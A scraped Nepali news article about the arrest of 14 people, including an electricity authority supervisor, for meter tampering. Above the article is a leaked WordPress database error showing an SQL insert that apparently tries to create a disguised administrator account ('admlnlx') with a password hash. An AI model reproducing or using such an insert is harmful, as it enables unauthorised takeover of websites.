WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B0PKonUDRHnPXJ1hE7FHRdM1LS2TdL0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 20:12:49', '', 'admlnlx', 'admlnlx')
काठमाडौं,माघ ९
विद्युत चोरीमा संलग्न भएको आरोपमा प्रहरीले नेपाल विद्युत प्राधिकरणका सुपरभाइजरसहित १४ जनालाई पक्राउ गरेको छ । उनीहरु मध्ये ९ जना बहालवाला कर्मचारी छन् भने बाँकी अवकासप्राप्त ।
महानगरीय प्रहरी अपराध महाशाखा प्रमुख एसएसपी सर्वेन्द्र खनालका अनुसार उनीहरुले मिटर विगार्ने र प्राधिकरणलाई घाटा पार्दै आएको खुलेको छ ।
उनले भने, ‘मिटर विगार्ने र विलिङ कम गर्ने गरेका रहेछन् ।’
मिटर विगारेर कम बिलिङ गरे वापत उनीहरुले उद्योगहरुबाट रकम लिने गरेका थिए ।
पक्राउ परेका सुपरभाइजर सुमन श्रेष्ठको साथबाट मिटर बिगार्ने मेसिन समेत बरामद भएको छ ।